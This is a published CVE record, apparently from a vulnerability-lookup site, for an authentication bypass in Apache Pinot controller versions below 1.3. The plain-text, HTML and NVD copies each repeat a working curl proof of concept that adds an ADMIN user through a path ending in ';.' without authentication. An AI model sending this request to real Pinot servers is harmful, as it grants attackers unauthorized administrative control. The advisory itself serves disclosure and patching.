CVE-2024-56325
Vulnerability from cvelistv5
Published
2025-04-01 09:07
Modified
2025-04-01 10:03
Severity ?
EPSS score ?
Summary
Authentication Bypass Issue
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
References
Impacted products
Vendor | Product | Version | ||
---|---|---|---|---|
Apache Software Foundation | Apache Pinot |
Version: 0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2025-04-01T10:03:56.094Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { url: "http://www.openwall.com/lists/oss-security/2025/03/27/8", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", packageName: "org.apache.pinot.controller.api", product: "Apache Pinot", vendor: "Apache Software Foundation", versions: [ { lessThan: "1.3", status: "affected", version: "0", versionType: "maven", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<b>Authentication Bypass Issue</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">If the path does not contain / and contain., authentication is not required.<br><br><b>Expected Normal Request and Response Example</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">curl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} <a target=\"_blank\" rel=\"nofollow\" href=\"http://{server_ip}:9000/users\">http://{server_ip}:9000/users</a><br><br>\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}</span><br><br><br><b>Malicious Request and Response Example</b> <br><br>curl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'<b> </b><a target=\"_blank\" rel=\"nofollow\" href=\"http://{serverip}:9000/users;\"><b>http://{serverip}:9000/users;</b></a><b>.</b><br><br>\nReturn: {\"users\":{}}\n<br><br>\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.</span><br><br>", }, ], value: "Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.", }, ], metrics: [ { other: { content: { text: "critical", }, type: "Textual description of severity", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-288", description: "CWE-288 Authentication Bypass Using an Alternate Path or Channel", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2025-04-01T09:07:14.185Z", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "vendor-advisory", ], url: "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v", }, ], source: { discovery: "EXTERNAL", }, title: "Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required", x_generator: { engine: "Vulnogram 0.2.0", }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2024-56325", datePublished: "2025-04-01T09:07:14.185Z", dateReserved: "2024-12-19T14:28:37.532Z", dateUpdated: "2025-04-01T10:03:56.094Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { nvd: "{\"cve\":{\"id\":\"CVE-2024-56325\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2025-04-01T09:15:15.240\",\"lastModified\":\"2025-04-01T20:26:11.547\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Authentication Bypass Issue\\n\\nIf the path does not contain / and contain., authentication is not required.\\n\\nExpected Normal Request and Response Example\\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d {\\\\\\\"username\\\\\\\":\\\\\\\"hack2\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"} http://{server_ip}:9000/users \\n\\n\\nReturn: {\\\"code\\\":401,\\\"error\\\":\\\"HTTP 401 Unauthorized\\\"}\\n\\n\\nMalicious Request and Response Example \\n\\ncurl -X POST -H \\\"Content-Type: application/json\\\" -d '{\\\\\\\"username\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"password\\\\\\\":\\\\\\\"hack\\\\\\\",\\\\\\\"component\\\\\\\":\\\\\\\"CONTROLLER\\\\\\\",\\\\\\\"role\\\\\\\":\\\\\\\"ADMIN\\\\\\\",\\\\\\\"tables\\\\\\\":[],\\\\\\\"permissions\\\\\\\":[],\\\\\\\"usernameWithComponent\\\\\\\":\\\\\\\"hack_CONTROLLER\\\\\\\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .\\n\\n\\nReturn: {\\\"users\\\":{}}\\n\\n\\n\\n \\n\\nA new user gets added bypassing authentication, enabling the user to control Pinot.\"}],\"metrics\":{},\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"references\":[{\"url\":\"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v\",\"source\":\"security@apache.org\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2025/03/27/8\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}", }, }
Log in or create an account to share your comment.
Security Advisory comment format.
This schema specifies the format of a comment related to a security advisory.
Title of the comment
Description of the comment
Loading…
Loading…
Loading…
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.